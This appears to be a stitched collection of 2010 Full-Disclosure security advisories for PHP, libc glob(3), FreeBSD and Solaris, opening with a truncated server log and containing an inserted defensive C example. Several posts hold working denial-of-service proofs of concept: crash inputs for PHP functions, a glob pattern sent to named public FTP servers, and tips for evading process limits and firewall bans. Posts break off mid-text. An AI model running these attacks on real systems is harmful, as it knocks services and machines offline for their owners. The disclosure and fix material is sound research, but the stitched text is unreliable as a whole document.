PHP 5.3.4 (cli) (built: Nov 11 2010 17:17:35)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
$ pwd && ls -la
/home/cx/public_html
total 4
drwxrwxrwx   2 cx  cx  512 Dec 19 01:10 .
drwxr-xr-x  12 cx  wheel  1024 Dec 19 01:10 ..
$ vi poc.php
$ ls -la .
total 8
drwxrwxrwx   2 cx  cx  512 Dec 19 01:16 .
drwxr-xr-x  12 cx  wheel  1024 Dec 19 01:10 ..
- -rw-r--r--   1 cx  cx 2665 Dec 19 01:18 poc.php


and remote request to poc.php
c...@cx64:~$ curl http://172.16.124.128/~cx/poc.php

On the server, all Apache children will stop in .htaccess (mod_rewrite =>
PCRE):

# ps -aux -U www
USER     PID %CPU %MEM   VSZ   RSS TTY STAT STARTED     TIME COMMAND
www  503 13.8  2.4 35620 27420 ?   R 1:19AM 0:04.94
/usr/pkg/sbin/httpd -k start
www  414  9.6  2.3 33572 25400 ?   R 1:20AM 0:03.24
/usr/pkg/sbin/httpd -k start
www  474  7.9  2.2 32548 24544 ?   R 1:19AM 0:02.17
/usr/pkg/sbin/httpd -k start
www  345  6.5  2.1 31524 23888 ?   R 1:19AM 0:01.79
/usr/pkg/sbin/httpd -k start
www  482  7.0  1.9 29476 21536 ?   R 1:22AM 0:00.94
/usr/pkg/sbin/httpd -k start
www  495  4.6  2.0 30500 22944 ?   R 1:19AM 0:01.24
/usr/pkg/sbin/httpd -k start
www  844  3.2  0.5 11980  5280 ?   S 1:22AM 0:00.94
/usr/pkg/libexec/cgi-bin/php
www  289  2.2  1.0 19236 10888 ?   R 1:22AM 0:00.23
/usr/pkg/sbin/httpd -k start
www  859  3.2  1.5 25380 17220 ?   R 1:22AM 0:00.44
/usr/pkg/sbin/httpd -k start
www  337  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  502  0.0  0.3 11988  3252 ?   S 1:19AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  543  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  554  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  754  0.0  0.4 12068  3940 ?   S 1:19AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  955  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
www  979  0.0  0.3 12068  3152 ?   S 1:22AM 0:00.01
/usr/pkg/sbin/httpd -k start
# ps -aux -U www
USER     PID %CPU %MEM   VSZ   RSS TTY STAT STARTED     TIME COMMAND
www   389  4.0  1.9 29476 21360 ?   R 1:22AM 0:00.80
/usr/pkg/sbin/httpd -k start
www   455  4.3  1.8 28452 20080 ?   R 1:22AM 0:00.55
/usr/pkg/sbin/httpd -k start
www   712  4.9  1.8 27428 19688 ?   R 1:22AM 0:00.51
/usr/pkg/sbin/httpd -k start
www   516  3.8  2.1 31524 23632 ?   R 1:22AM 0:02.05
/usr/pkg/sbin/httpd -k start
...
www  1011  2.3  2.0 30500 21980 ?   R 1:22AM 0:01.16
/usr/pkg/sbin/httpd -k start
www   398  0.0  0.3 12068  3156 ?   S 1:23AM 0:00.01
/usr/pkg/sbin/httpd -k start
www   400  0.0  0.3 12068  3156 ?   S 1:23AM 0:00.01
/usr/pkg/sbin/httpd -k start
www   502  0.0  0.3 11988  3252 ?   I 1:19AM 0:00.01
/usr/pkg/sbin/httpd -k start
www   653  0.0  0.3 12068  3156 ?   S 1:23AM 0:00.01
/usr/pkg/sbin/httpd -k start
www   754  0.0  0.4 12068 

[Full-disclosure] PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow

2010-12-10 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 11.11.2010
- - Pub.: 10.12.2010

CERT: VU#479900
CVE: CVE-2010-4409
CWE: CWE-189
Status: Fixed in PHP 5.3.4

Affected Software:
- - PHP 5.3.3

Original URL:
http://securityreason.com/achievement_securityalert/91


- --- 0.Description ---
Internationalization extension (further referred to as Intl) is a
wrapper for the ICU library, enabling PHP programmers to perform
UCA-conformant collation and date/time/number/currency formatting in
their scripts.

Number Formatter: allows displaying numbers according to the localized
format or a given pattern or set of rules, and parsing strings into numbers.


- --- 1. PoC for Integer Overflow ---
$nx=new NumberFormatter("pl",1);
$nx->getSymbol(2147483648);


- --- 2. PHP 5.3.3/5.2.14 NumberFormatter::getSymbol Integer Overflow ---
As we can see in

- ---
PHP_FUNCTION( numfmt_get_symbol )
{
    long symbol;
    UChar value_buf[4];
    UChar *value = value_buf;
    int length = USIZE(value);
    FORMATTER_METHOD_INIT_VARS;

    /* Parse parameters. */
    if( zend_parse_method_parameters( ZEND_NUM_ARGS() TSRMLS_CC, getThis(), "Ol",
        &object, NumberFormatter_ce_ptr, &symbol ) == FAILURE )
    {
        intl_error_set( NULL, U_ILLEGAL_ARGUMENT_ERROR,
            "numfmt_get_symbol: unable to parse input params", 0 TSRMLS_CC );

        RETURN_FALSE;
    }

    /* Fetch the object. */
    FORMATTER_METHOD_FETCH_OBJECT;

    length = unum_getSymbol(FORMATTER_OBJECT(nfo), symbol, value_buf,
        length, &INTL_DATA_ERROR_CODE(nfo)); <= !!!TOO BIG INT HERE!!!
...
- ---

will crash for different values, for example {292804, 2147483648,
2147483649, 2554462209} (when rdi is out of bounds; range 2^31 to 2^32
under 64-bit Linux).

Program received signal SIGSEGV, Segmentation fault.
0x7fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*,
int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
(gdb) bt
#0  0x7fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned
short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#1  0x7fffee5d11c0 in zif_numfmt_get_symbol (ht=17168120,
return_value=0x105c928, return_value_ptr=0x4, this_ptr=0x105f710,
return_value_used=17168144)
at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:269
...blabla

rip            0x7fffedf317f5   0x7fffedf317f5

eflags 0x10206  [ PF IF RF ]

Let's see the value ~4294901761:

$nx=new NumberFormatter("pl",1);
$nx->getSymbol(4294901761);

will crash in memcpy(3) ;]

Program received signal SIGSEGV, Segmentation fault.
memcpy () at ../sysdeps/x86_64/memcpy.S:90
90  ../sysdeps/x86_64/memcpy.S: No such file or directory.
in ../sysdeps/x86_64/memcpy.S
(gdb) bt
#0  memcpy () at ../sysdeps/x86_64/memcpy.S:90
#1  0x7fffea74a86a in icu_4_2::UnicodeString::extract(unsigned
short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#2  0x7fffeadea2b4 in zif_numfmt_get_symbol (ht=17826952,
return_value=0x10fecd0, return_value_ptr=0xc, this_ptr=0x11004a0,
return_value_used=17826976)
at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:274
#3  0x006e986a in zend_do_fcall_common_helper_SPEC (
execute_data=0x77eb8068)
at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316
...

let's see ICU UnicodeString::extract(unsigned short*, int, UErrorCode&)

- ---
int32_t
UnicodeString::extract(UChar *dest, int32_t destCapacity,
   UErrorCode &errorCode) const {
  int32_t len = length();
  if(U_SUCCESS(errorCode)) {
if(isBogus() || destCapacity<0 || (destCapacity>0 && dest==0)) {
  errorCode=U_ILLEGAL_ARGUMENT_ERROR;
} else {
  const UChar *array = getArrayStart();
  if(len>0 && len<=destCapacity && array!=dest) {
uprv_memcpy(dest, array, len*U_SIZEOF_UCHAR); <=== MEMCPY
REFERENCE HERE
  }
  return u_terminateUChars(dest, destCapacity, len, &errorCode);
}
  }

  return len;

}
- ---

So it crashes with rip in memcpy(3).

The getLocale() method can also generate a simple crash (CWE-170):

$nx=new IntlDateFormatter("pl", IntlDateFormatter::FULL,
IntlDateFormatter::FULL);
$nx->getLocale(1);


- --- 3. Fix ---
Fix in next PHP Version 5.3.4:
http://www.kb.cert.org/vuls/id/479900

SVN:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/dateformat/dateformat_attr.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/formatter/formatter_attr.c?view=log


- --- 4. Greets ---
Special thanks to Pierre Joye and Stas Malyshev for the very quick fix,
and to Michael Orlando for security support

and sp3x, Infospec


- --- 5. Contact ---
Au

[Full-disclosure] PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Dereference

2010-11-06 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Dereference]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 14.09.2010
- - Pub.: 05.11.2010

CVE: CVE-2010-3709
CWE: CWE-476
Status: Fixed in CVS

Affected Software:
- - PHP 5.3.3
- - PHP 5.2.14

Original URL:
http://securityreason.com/achievement_securityalert/90


- --- 0.Description ---
ZipArchive enables you to transparently read or write ZIP compressed
archives and the files inside them.

ZipArchive::getArchiveComment - Returns the Zip archive comment

string ZipArchive::getArchiveComment  ( void  )


- --- 1. PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment (CWE-476) ---
As we can see in

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?revision=303622&view=markup

- ---
1945    static ZIPARCHIVE_METHOD(getArchiveComment)
1946    {
1947        struct zip *intern;
1948        zval *this = getThis();
1949        long flags = 0;
1950        const char * comment;
1951        int comment_len = 0;
1952
1953        if (!this) {
1954            RETURN_FALSE;
1955        }
1956
1957        ZIP_FROM_OBJECT(intern, this);
1958
1959        if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "|l", &flags) == FAILURE) {
1960            return;
1961        }
1962
1963        comment = zip_get_archive_comment(intern, &comment_len, (int)flags); <= RETURNS NULL AND -1
1964        RETURN_STRINGL((char *)comment, (long)comment_len, 1); <= NULL POINTER DEREFERENCE HERE
1965    }
- ---

This method returns a string from the zip_get_archive_comment() function.
Now we need to see this function:

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_get_archive_comment.c?revision=284361&view=markup

- ---
40  ZIP_EXTERN(const char *)
41  zip_get_archive_comment(struct zip *za, int *lenp, int flags)
42  {
43  if ((flags & ZIP_FL_UNCHANGED)
44  || (za->ch_comment_len == -1)) {
45  if (za->cdir) {
46  if (lenp != NULL)
47  *lenp = za->cdir->comment_len;
48  return za->cdir->comment;
49  }
50  else {
51  if (lenp != NULL)
52  *lenp = -1; <= -1
53  return NULL; < NULL
54  }
55  }
56  
57  if (lenp != NULL)
58  *lenp = za->ch_comment_len;
59  return za->ch_comment;
60  }
- ---


Lines 52 and 53 return a NULL pointer and (int)-1. As a result,
RETURN_STRINGL() will be executed with:

RETURN_STRINGL(NULL, -1, 1);

and crash in memcpy(3).


- --- 2. PoC ---

c...@cx64:/www$ touch empty.zip
c...@cx64:/www$ php -r '$zip= new
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
Segmentation fault

Debug:
c...@cx64:/www$ gdb -q php
Reading symbols from /usr/bin/php...(no debugging symbols found)...done.
(gdb) r -r '$zip= new
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
Starting program: /usr/bin/php -r '$zip= new
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x7530edbb in memcpy () from /lib/libc.so.6
(gdb) bt
#0  0x7530edbb in memcpy () from /lib/libc.so.6
#1  0x00679fa8 in _estrndup ()
#2  0x006371e5 in ?? ()
#3  0x006e793a in ?? ()
#4  0x006bec20 in execute ()
#5  0x0068b44a in zend_eval_stringl ()
#6  0x0068b5c9 in zend_eval_stringl_ex ()
#7  0x0072743e in ?? ()
#8  0x752a6c4d in __libc_start_main () from /lib/libc.so.6
#9  0x0042c6a9 in _start ()
(gdb) x/i $rip
=> 0x7530edbb : rep movsq %ds:(%rsi),%es:(%rdi)
(gdb) x/x $rsi
0x0:Cannot access memory at address 0x0
(gdb) x/x $rbp
0x: Cannot access memory at address 0x


- --- 3. Fix ---
Fix:
Replace
1963    comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
1964    RETURN_STRINGL((char *)comment, (long)comment_len, 1);

to

1963    comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
1964    if(comment==NULL) RETURN_FALSE;
1965    RETURN_STRINGL((char *)comment, (long)comment_len, 1);

PHP 5.3:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log

PHP 5.2:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/zip/php_zip.c?view=log

MDVSA-2010:218


- --- 4. Greets ---
Special thanks for Pierre Joye

sp3x, Infospec, Adam Zabrocki 'pi3'


- --- 5. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]

Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://cxib.net/

- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid  Maksymilian Arciemowicz (cx) 
sub   4096R/58BA663C 2010-09-19
-BEGIN PGP SIGN
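
The two PHP advisories above (NumberFormatter::getSymbol and ZipArchive::getArchiveComment) fail at the same place: the boundary where a script-controlled value or a library return value is handed to C without being checked. As an added example, not code from PHP, ICU or libzip, the block below shows both checks side by side: a range check on a long before it is narrowed to an int for a C API, and a caller that honours a "NULL and -1" return contract before building a string. The SYMBOL_MAX bound and the cut-down zip structures are stand-ins of this example's own.

```c
/* Added example, not code from PHP, ICU or libzip: the two checks the PHP
 * wrappers in the NumberFormatter::getSymbol and ZipArchive::getArchiveComment
 * advisories were missing. The SYMBOL_MAX bound and the cut-down zip
 * structures are this example's own stand-ins. */
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* ---- 1. Range-check a script-supplied long before narrowing it to int ---- */

/* Stand-in for the largest symbol constant the C API accepts; the real value
 * is the last member of ICU's symbol enum. */
#define SYMBOL_MAX 17

/* PHP parses the argument as a long, the ICU call takes an int. On LP64 the
 * implicit narrowing turns 2147483648 into INT_MIN and 4294901761 into
 * -65535, and either is then used to index a symbol table. Checking the
 * range before the narrowing keeps every later use in bounds.
 * Returns the narrowed value, or -1 when the input is rejected. */
int symbol_from_long(long raw)
{
    if (raw < 0 || raw > SYMBOL_MAX)      /* covers raw > INT_MAX as well */
        return -1;
    return (int)raw;                      /* now provably within int range */
}

/* ---- 2. Honour a "NULL and -1" return contract before building a string ---- */

struct cdir { const char *comment; int comment_len; };
struct zip  { struct cdir *cdir; const char *ch_comment; int ch_comment_len; };
#define ZIP_FL_UNCHANGED 8

/* Same control flow as the zip_get_archive_comment() quoted above: an
 * archive with no central directory (e.g. an empty file) yields NULL and
 * *lenp == -1. */
const char *model_get_archive_comment(struct zip *za, int *lenp, int flags)
{
    if ((flags & ZIP_FL_UNCHANGED) || za->ch_comment_len == -1) {
        if (za->cdir) {
            if (lenp) *lenp = za->cdir->comment_len;
            return za->cdir->comment;
        }
        if (lenp) *lenp = -1;
        return NULL;
    }
    if (lenp) *lenp = za->ch_comment_len;
    return za->ch_comment;
}

/* Copy the comment into a caller-owned buffer only if the pointer is
 * non-NULL, the length is non-negative and it fits. Returns the length
 * copied, or -1 when there is no comment: the case in which the unpatched
 * RETURN_STRINGL() handed NULL and -1 to memcpy(3). */
int archive_comment_copy(struct zip *za, int flags, char *dst, size_t cap)
{
    int len = 0;
    const char *c = model_get_archive_comment(za, &len, flags);
    if (c == NULL || len < 0 || (size_t)len >= cap)
        return -1;
    memcpy(dst, c, (size_t)len);
    dst[len] = '\0';
    return len;
}

/* Scenario from the advisory: "touch empty.zip" then getArchiveComment(). */
int empty_archive_comment(void)
{
    struct zip za = { NULL, NULL, -1 };
    char buf[32];
    return archive_comment_copy(&za, 0, buf, sizeof buf);   /* -1, no crash */
}

/* Scenario with a real comment: the copy succeeds and is NUL-terminated. */
bool commented_archive_roundtrip(void)
{
    struct cdir cd = { "built by cx", 11 };           /* constructed sample */
    struct zip za = { &cd, NULL, -1 };
    char buf[32];
    return archive_comment_copy(&za, 0, buf, sizeof buf) == 11
        && strcmp(buf, "built by cx") == 0;
}

int main(void)
{
    printf("getSymbol(2147483648) -> %d\n", symbol_from_long(2147483648L));
    printf("getSymbol(3)          -> %d\n", symbol_from_long(3L));
    printf("empty archive comment -> %d\n", empty_archive_comment());
    printf("commented archive ok  -> %d\n", commented_archive_roundtrip());
    return 0;
}
```

The point of the first check is that the comparison happens on the wide type: once a value has been cast to int, a later bounds check can no longer tell 2147483648 from INT_MIN. The point of the second is that a function documented to return NULL together with a negative length needs the caller to test both before the pair reaches memcpy(3), which is exactly what the one-line PHP fix quoted above adds.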

[Full-disclosure] Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon)

2010-10-09 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ Multiple Vendors libc/glob(3) resource exhaustion (+0day remote
ftpd-anon) ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 06.11.2009
- - Pub.: 07.10.2010

CVE: CVE-2010-2632

Affected Software (verified):
- - OpenBSD 4.7
- - NetBSD 5.0.2
- - FreeBSD 7.3/8.1
- - Oracle Sun Solaris 10
- - GNU Libc (glibc)

Affected Ftp Servers:
- - ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban)
- - ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached"
and ban)
- - ftp.freebsd.org
- - ftp.adobe.com
- - ftp.hp.com
- - ftp.sun.com
- - more more and more

Affected Vendors (not verified):
- - Apple
- - Microsoft Interix
- - HP
- - more more more

Original URL:
http://securityreason.com/achievement_securityalert/89


- --- 0.Description ---

#include <glob.h>

int  glob(const char *pattern, int flags,
  int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);

Description

This function expands a filename wildcard which is passed as pattern.

     GLOB_LIMIT   Limit the amount of memory used by matches to ARG_MAX.
                  This option should be set for programs that can be
                  coerced to a denial of service attack via patterns that
                  expand to a very large number of matches, such as a long
                  string of */../*/..


- --- 1. Multiple Vendors libc/glob(3) resource exhaustion ---
As we can read in the definition of GLOB_LIMIT:

- --
Limit the amount of memory used by matches to ARG_MAX. This option
should be set for programs that can be coerced to a denial of service
attack via patterns that expand to a very large number of matches,
such as a long string of */../*/..
- ---

But now comes the question: "what will happen when we use */.. without
matching any results (simple searching)?" GLOB_LIMIT will not be
overflowed. To realize it, we only need to use a pattern with many
*/.. and many inodes in the current directory. At the end of the pattern,
we need to add some non-existent filename (like /cxib*).
If we don't have many files or directories in the attacked directory, we
need to create some dir structure.

Let's see again:
http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c?rev=1.61.2.5&content-type=text/x-cvsweb-markup

GLOB_LIMIT

protects us against attacks like

*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*

because glob will find more paths than declared in GLOB_LIMIT. Anyway,
if we use a path which does not exist (with */.. strings) like

*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*blablahaha

GLOB_LIMIT will never be overflowed. Many combinations of paths will
make this process execute for a long time. We can also try to allocate
(GLOB_LIMIT-1)*MAXPATHNAMELEN bytes per process. ~200~300MB

Example:
> telnet ftp.netbsd.org 21
Trying 204.152.190.15...
Connected to ftp.netbsd.org.
Escape character is '^]'.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready.
user anonymous
331 Guest login ok, type your name as password.
pass a...@cxib
230-
The NetBSD Project FTP Server located in Redwood City, CA, USA
 ...
230-
EXPORT NOTICE

 ...
230 Guest login ok, access restrictions apply.
stat
{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx


This request will generate 100% usage of the process for a long time. ftpd
goes into glob(3) and will not come out fast. A very similar symptom was
described in the vulnerability for glibc strfmon(3):

- - http://securityreason.com/achievement_securityalert/67 --
...
Interesting is that the PHP memory_limit has no control over what will
happens in the level of the libc. Function strfmon(3) can allocate a lot of
data in memory without control by PHP memory_limit.

For example:
php -r 'money_format("%.1343741821i",1);'

will allocate ~1049MB real memory.
memory_limit can be less that 1049M
...
- - http://securityreason.com/achievement_securityalert/67 --

ftpd also doesn't control what will happen in libc.

so it is enough to send
- ---
USER anonymous
PASS
STAT */..[calculated pattern]
- ---

and disconnect to connect again (bypassing firewall limits). In PHP we can
also bypass max_memory_limit via libc vulns.

Attacking a machine in this way, we can cause various side effects.

- -kernel panic in netbsd502---
Jul  5 10:18:13  dhclient: DHCPACK from 192.168.92.254
Jul  5 10:18:14  dhclient: bound to 192.168.92.171 -- renewal in 886
seconds.
Jul  5 10:22:43  syslogd: restart
Jul  5 10:22:43  /netbsd: uvm_fault(0xcc2eb35c, 0, 2) -> 0xe
Jul  5 10:22:43  /netbsd: fatal page fault in supervisor mode
Jul  5 10:22:43  /netbsd: trap type 6 code 2 eip c07d9784 cs 8 eflags
10206 cr2 0 ilevel 0
Jul  5 10:22:43  /netbsd: panic: trap
Jul  5 10:22:43  /netbsd: Begin traceback...
Jul  5 10:22:43  /netbsd: End traceba

[Full-disclosure] FreeBSD 8.1/7.3 vm.pmap kernel local race condition

2010-09-08 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ FreeBSD 8.1/7.3 vm.pmap kernel local race condition  ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
http://lu.cxib.net
Date:
- - Dis.: 09.07.2010
- - Pub.: 07.09.2010

Affected Software (verified):
- - FreeBSD 7.3/8.1

Original URL:
http://securityreason.com/achievement_securityalert/88


- --- 0.Description ---
maxproc
This is the maximum number of processes a user may be running. This
includes foreground and background processes alike. For obvious reasons,
this may not be larger than the system limit specified by the
kern.maxproc sysctl(8). Also note that setting this too small may hinder
a user's productivity: it is often useful to be logged in multiple times
or execute pipelines. Some tasks, such as compiling a large program,
also spawn multiple processes (e.g., make(1), cc(1), and other
intermediate preprocessors).
vm.pmap.shpgperproc


- --- 1. FreeBSD 8.1/7.3 kernel local race condition ---
A race condition in pmap allows attackers to cause a denial of service in
the FreeBSD kernel. By creating a lot of processes with fork() (~
kern.maxproc), it's possible to deny the kernel.
To bypass MAXPROC from login.conf, we can use a few users to run the PoC
at the same time, to reach kern.maxproc. suphp can be very useful.

We need to choose an attack vector. When we have access to a few users via
ssh, use openssh.

Example attack by ssh
(POC:http://securityreason.com/achievement_exploitalert/16):

127# ssh c...@0
Password:
$ gcc -o poc81 poc81.c
$ ./poc81

and at the same time (symmetric)

127# ssh m...@0
Password:
$ gcc -o poc81 poc81.c
$ ./poc81

Result:
Jul 29 08:41:29 127 kernel: maxproc limit exceeded by uid 1002, please
see tuning(7) and login.conf(5).
Jul 29 08:42:01 127 last message repeated 31 times
Jul 29 08:44:02 127 last message repeated 119 times
Jul 29 08:50:27 127 syslogd: kernel boot file is /boot/kernel/kernel
Jul 29 08:50:27 127 kernel: maxproc limit exceeded by uid 0, please see
tuning(7) and login.conf(5).
Jul 29 08:50:27 127 kernel: panic: get_pv_entry: increase
vm.pmap.shpgperproc
Jul 29 08:50:27 127 kernel: cpuid = 0
Jul 29 08:50:27 127 kernel: Uptime: 13m23s
Jul 29 08:50:27 127 kernel: Cannot dump. Device not defined or unavailable.
Jul 29 08:50:27 127 kernel: Automatic reboot in 15 seconds - press a key
on the console to abort
Jul 29 08:50:27 127 kernel: --> Press a key on the console to reboot,
Jul 29 08:50:27 127 kernel: --> or switch off the system now.
Jul 29 08:50:27 127 kernel: Rebooting...
Jul 29 08:50:27 127 kernel: Copyright (c) 1992-2010 The FreeBSD Project.

But when we have a PHP shell from several uids, we can also use suphp.

Example attack by suphp:
127# cat cxuser.php

127# ls -la
total 16
drwxr-xr-x  2 root  wheel   512 Jul 29 08:43 .
drwxr-xr-x  4 root  wheel   512 Jul 29 08:38 ..
- -rw-r--r--  1 cxcx   27 Jul 29 08:38 cxuser.php
- -rwxr-xr-x  1 cxcx 7220 Jul 29 08:38 def
- -rw-r--r--  1 max   max  27 Jul 29 08:43 maxuser.php

now remote request to cxuser.php and maxuser.php

curl http://victim/hack/cxuser.php
and in the same time
curl http://victim/hack/maxuser.php

result:
Jul 29 08:43:07 localhost login: ROOT LOGIN (root) ON ttyv0
Jul 29 08:48:30 localhost syslogd: kernel boot file is /boot/kernel/kernel
Jul 29 08:48:30 localhost kernel: maxproc limit exceeded by uid 1001,
please see tuning(7) and login.conf(5).
Jul 29 08:48:30 localhost kernel: panic: get_pv_entry: increase
vm.pmap.shpgperproc
Jul 29 08:48:30 localhost kernel: cpuid = 0
Jul 29 08:48:30 localhost kernel: Uptime: 4m43s
Jul 29 08:48:30 localhost kernel:
Jul 29 08:48:30 localhost kernel: Dump failed. Partition too small.
Jul 29 08:48:30 localhost kernel: Automatic reboot in 15 seconds - press
a key on the console to abort
Jul 29 08:48:30 localhost kernel: Rebooting...
Jul 29 08:48:30 localhost kernel: Copyright (c) 1992-2010 The FreeBSD
Project.


- ---debug log - cron (uid=0)---
...
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
panic: get_pv_entry: increase vm.pmap.shpgperproc
cpuid = 0
KDB: enter: panic
[ thread pid 7417 tid 106207 ]
Stopped at kdb_enter+0x3a: movl $0,kdb_why
...
KDB: enter: panic
[ thread pid 7417 tid 106207 ]
Stopped at kdb_enter+0x3a: movl $0,kdb_why
db> ps
pid ppid pgrp uid state wmesg wchan cmd
7417 880 880 0 RL CPU 0 cron
7416 880 880 0 RL cron
7415 7413 880 0 RVL cron
7414 7412 7412 0 R sh
7413 880 880 0 D ppwait 0xc8118548 cron
7412 7411 7412 0 Ss wait 0xc8118aa0 sh
7411 880 880 0 S piperd 0xc4d7eab8 cron
7410 5367 1294 1001 RL+ def
7409 5366 1294 1001 RL+ def
7408 5365 1294 1001 RL+ def
7407 5364 1294 1001 RL+ def
7406 5363 1294 1001 RL+ def
7405 5362 1294 1001 RL+ def
7404 5361 1294 1001 RL+ def
...
db> trace
Tracing 

[Full-disclosure] Sun Solaris 10 libc/*convert (*cvt) buffer overflow

2010-05-21 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ Sun Solaris 10 libc/*convert (*cvt) buffer overflow ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 15.04.2010
- - Pub.: 21.05.2010

Affected Software:
- - Sun Solaris 10 10/9

Original URL:
http://securityreason.com/achievement_securityalert/86


- --- 0.Description ---
SYNOPSIS
 #include <floatingpoint.h>

 char *econvert(double value, int  ndigit,  int  *decpt,  int
 *sign, char *buf);

 char *fconvert(double value, int  ndigit,  int  *decpt,  int
 *sign, char *buf);

 char *gconvert(double value, int ndigit, int trailing,  char
 *buf);

 char *seconvert(single *value, int ndigit, int  *decpt,  int
 *sign, char *buf);

 char *sfconvert(single *value, int ndigit, int  *decpt,  int
 *sign, char *buf);

 char *sgconvert(single *value,  int  ndigit,  int  trailing,
 char *buf);

 char *qeconvert(quadruple *value, int  ndigit,  int  *decpt,
 int *sign, char *buf);

 char *qfconvert(quadruple *value, int  ndigit,  int  *decpt,
 int *sign, char *buf);

 char *qgconvert(quadruple *value, int ndigit, int  trailing,
 char *buf);

 The econvert()  function  converts  the  value  to  a  null-
 terminated  string of ndigit ASCII digits in buf and returns
 a pointer to buf. buf should contain at least ndigit+1 char-
 acters.  The  position  of the decimal point relative to the
 beginning of the string is stored indirectly through  decpt.
 Thus buf == "314" and *decpt == 1 corresponds to the numeri-
 cal value  3.14,  while  buf  ==  "314"  and  *decpt  ==  -1
 corresponds to the numerical value .0314. If the sign of the
 result is negative, the word pointed to by sign is  nonzero;
 otherwise  it  is  zero.   The  least  significant  digit is
 rounded.

SYNOPSIS
 #include <stdlib.h>

 char *ecvt(double value, int ndigit,  int  *restrict  decpt,
 int *restrict sign);

 char *fcvt(double value, int ndigit,  int  *restrict  decpt,
 int *restrict sign);

 char *gcvt(double value, int ndigit, char *buf);

DESCRIPTION
 The ecvt(), fcvt() and gcvt()  functions  convert  floating-
 point numbers to null-terminated strings.


- --- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow ---
The main problem exists in sun solaris libc. OpenSolaris is not affected.

PoC:
- ---
# cat jaja.c
#include <stdio.h>
#include <stdlib.h>
#include <floatingpoint.h>

int main (int argc, char *argv[]){

char number[1];

int a,b;

printf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number));
return 0;
}

# /usr/local/bin/gcc -o jaja jaja.c
# ./jaja 16
#
# ./jaja 512
#
- ---

For 512 it will work fine, because we have used (double)0 to convert. When
we use a non-zero value, it crashes.

OK, let's set a non-zero value in jaja2.c

Poc:
- ---
# cat jaja2.c
#include <stdio.h>
#include <stdlib.h>
#include <floatingpoint.h>

int main (int argc, char *argv[]){

char number[1];

int a,b;

